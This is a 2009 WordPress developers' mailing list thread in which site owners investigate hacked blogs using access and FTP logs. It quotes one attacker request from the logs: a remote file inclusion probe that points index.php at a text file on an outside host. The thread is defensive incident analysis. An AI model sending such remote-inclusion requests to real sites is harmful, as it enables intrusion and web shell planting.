[wp-hackers] Hacked blogs

Dinh Ba Thanh bathanh at gmail.com
Thu Mar 26 16:04:32 GMT 2009 

Can you try that URL on your web browser, since the remote file is  
still up?

Best Regards,
Dinh Ba Thanh, Jason
bathanh at gmail.com




On Mar 27, 2009, at 12:00 AM, Joost de Valk wrote:

> Exactly, it's a check.
>
> Going through the access logs I can't find anything else yet though,  
> what we DO see on one of the hosts is that the "infected" files were  
> uploaded through FTP (we can see that in the xfer.log), but if I'm  
> not mistaken, that could still be done through XSS right?
>
> Dinh Ba Thanh wrote:
>> If the attacker is able to inject that chunk of code, other things  
>> could be include as well, eg: shell
>>
>> Best Regards,
>> Dinh Ba Thanh, Jason
>> bathanh at gmail.com
>>
>>
>>
>>
>> On Mar 26, 2009, at 11:53 PM, Peter van der Does wrote:
>>
>>> On Thu, 26 Mar 2009 16:44:01 +0100
>>> Joost de Valk <joost at yoast.com> wrote:
>>>
>>>> Nope, can't find a bloody thing yet. These kind of requests:
>>>>
>>>> GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt????
>>>> HTTP/1.1
>>>>
>>>> in all the logs, but grepping through the entire htdocs dir,  
>>>> nothing
>>>> that responds to them.
>>>
>>> I don't believe that attack is what caused your problem.
>>> The script that is called is a killroy script.
>>> It will show server related information, like the OS, Uptime. Stuff
>>> like that and "<insert name> was here .."
>>>
>>> -- 
>>> Peter van der Does
>>>
>>> GPG key: E77E8E98
>>>
>>> WordPress Plugin Developer
>>> http://blog.avirtualhome.com
>>>
>>> GetDeb Package Builder/GetDeb Site Coder
>>> http://www.getdeb.net - Software you want for Ubuntu
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

More information about the wp-hackers mailing list